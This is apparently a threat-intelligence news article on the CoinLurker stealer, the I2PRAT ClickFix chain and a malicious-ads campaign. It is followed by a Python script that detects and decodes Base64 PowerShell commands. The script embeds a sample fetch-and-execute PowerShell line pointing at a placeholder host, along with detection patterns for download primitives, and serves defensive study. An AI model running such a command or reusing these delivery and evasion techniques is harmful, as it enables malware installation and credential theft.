Threat actors are using fake software updates to deliver a new stealer malware called CoinLurker.
“Written in Go, CoinLurker uses advanced obfuscation and anti-analysis techniques, making it a very effective tool in today’s cyberattacks,” Morphisec researcher Nadav Lorber said in a technical report published on Monday.
The attacks rely on fake update alerts delivered through a variety of deceptive entry points, such as software update notifications on compromised WordPress sites, malicious redirects, phishing emails with links to fake update pages, fake CAPTCHA verification requests, direct downloads from fake or infected sites, and links shared through social networks and messaging apps.
Regardless of the method used to start the infection chain, the software update prompts use Microsoft Edge Webview2 to begin executing the payload.
“Webview2’s dependence on pre-installed components and user interaction makes dynamic and sandbox analysis difficult,” Lorber said. “Sandboxes often lack Webview2 or do not repeat user actions, allowing malware to escape automatic detection.”
One of the advanced tactics adopted by the attackers involves a technique called EtherHiding, in which compromised sites are seeded with scripts that query Web3 infrastructure to retrieve the final payload from a Bitbucket repository, where it masquerades as a legitimate tool (e.g., “UpdateMe.exe”, “SecurityPatch.exe”).
These executables are in turn signed with a legitimate but stolen Extended Validation (EV) certificate, adding another layer of deception to the scheme and helping it bypass security defenses. In the final step, a “multi-layer injector” is used to inject the payload into the Microsoft Edge process (“msedge.exe”).
CoinLurker also uses clever design to hide its actions and complicate analysis, including heavy obfuscation to check if a machine has already been compromised, decoding the payload directly in memory at runtime, and taking steps to obfuscate the program’s execution path with conditional checks, redundant resource assignments and iterative memory manipulation.
“This approach ensures that malware goes undetected, easily blends into legitimate system activity, and bypasses network security rules that rely on process behavior for filtering,” Morphisec noted.
Once launched, CoinLurker initiates communication with a remote server using a socket-based approach and proceeds to collect data from specific directories related to cryptocurrency wallets (namely Bitcoin, Ethereum, Ledger Live, and Exodus), Telegram, Discord, and FileZilla.
“This comprehensive scan highlights CoinLurker’s primary goal of collecting valuable cryptocurrency-related data and user credentials,” Lorber said. “Its targeting of both mainstream and obscure wallets demonstrates its versatility and adaptability, making it a significant threat to users in the cryptocurrency ecosystem.”
The development comes after a single threat actor was spotted running 10 malicious campaigns abusing Google Search ads to target graphic design professionals since at least November 13, 2024, using lures related to FreeCAD, Rhinoceros 3D, Planner 5D, and Onshape.
“Domains were launched day after day, week after week, since at least November 13, 2024, for malicious ad campaigns located at two dedicated IP addresses: 185.11.61(.)243 and 185.147.124(.)110,” Silent Push said. “Sites originating from these two IP address ranges run Google Search ad campaigns, all of which lead to a lot of malicious downloads.”
It also follows the emergence of a new malware family called I2PRAT, which abuses the I2P peer-to-peer network for encrypted communication with its command-and-control (C2) server. It should be noted that I2PRAT is also tracked by Cofense under the name I2Parcae RAT.
The attack starts with a phishing email containing a link that, when clicked, takes the recipient to a fake CAPTCHA verification page. The page uses the ClickFix technique to trick the user into copying and executing a Base64-encoded PowerShell command that launches a loader, which then deploys the RAT after receiving it from the C2 server over a TCP socket.
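The ClickFix step above hinges on a victim pasting a Base64-encoded PowerShell one-liner, which is something a defender can decode and triage from process-creation telemetry. The script below is an added example written for this article, not code from Morphisec, Cofense or the article itself: it reconstructs the `-EncodedCommand` argument (PowerShell expects UTF-16LE text, then Base64), decodes it, and scores the record on signals the article describes (an encoded command spawned by explorer.exe, the parent of a Run-dialog paste, plus hidden-window and download-and-execute markers). The log format, the regular expressions, the scoring and the sample records are all assumptions constructed for the example; the decoded sample command uses a reserved example domain.

```python
import base64
import re

# Constructed sample of what a ClickFix lure might ask the user to paste, once decoded.
# It is NOT taken from the article; the domain is a reserved example name and the
# string exists only as test input for the detector below.
SAMPLE_DECODED = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update')"


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records in a loose "parent|image|command line" format
# (assumed layout, not any particular EDR's schema).
SAMPLE_LOGS = [
    "explorer.exe|explorer.exe|C:\\Windows\\explorer.exe",
    "cmd.exe|powershell.exe|powershell.exe -NoProfile -Command Get-Date",
    "explorer.exe|powershell.exe|powershell.exe -w hidden -ep bypass -enc " + encode_powershell(SAMPLE_DECODED),
]

# -EncodedCommand and the shortened forms PowerShell accepts for it, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|ncoded|nc|c|n)?\s+([A-Za-z0-9+/=]{16,})")
# Switches that hide the console window or disable execution policy, typical of pasted one-liners.
EVASION_FLAGS = re.compile(r"(?i)-(?:w(?:indowstyle)?\s+hidden|(?:ep|executionpolicy)\s+bypass)")
# Download-and-run primitives worth flagging when they appear inside the decoded script.
SUSPICIOUS_CONTENT = re.compile(r"(?i)IEX|Invoke-Expression|DownloadString|Invoke-WebRequest|FromBase64String")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or not valid UTF-16LE base64."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(record: str) -> dict:
    """Score one process-creation record and list the reasons behind the verdict."""
    parent, image, cmdline = record.split("|", 2)
    reasons = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        # ClickFix victims paste into the Run dialog, so explorer.exe is the usual parent.
        if parent.lower() == "explorer.exe":
            reasons.append("encoded PowerShell spawned by explorer.exe")
        for hit in sorted({h.lower() for h in SUSPICIOUS_CONTENT.findall(decoded)}):
            reasons.append(f"decoded content uses {hit}")
        if EVASION_FLAGS.search(cmdline):
            reasons.append("hidden window / execution policy bypass")
    score = len(reasons)
    verdict = "suspicious" if score >= 2 else "review" if score == 1 else "benign"
    return {"image": image, "verdict": verdict, "reasons": reasons, "decoded": decoded}


if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        result = triage(line)
        print(result["verdict"], result["image"], result["reasons"])
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

Decoding before matching matters because the Base64 blob hides every keyword a command-line rule would otherwise catch; a lone encoded command only earns a "review" verdict here, since administrators do use `-EncodedCommand` legitimately, and it is the combination with an explorer.exe parent, hidden window and download primitives that pushes a record to "suspicious".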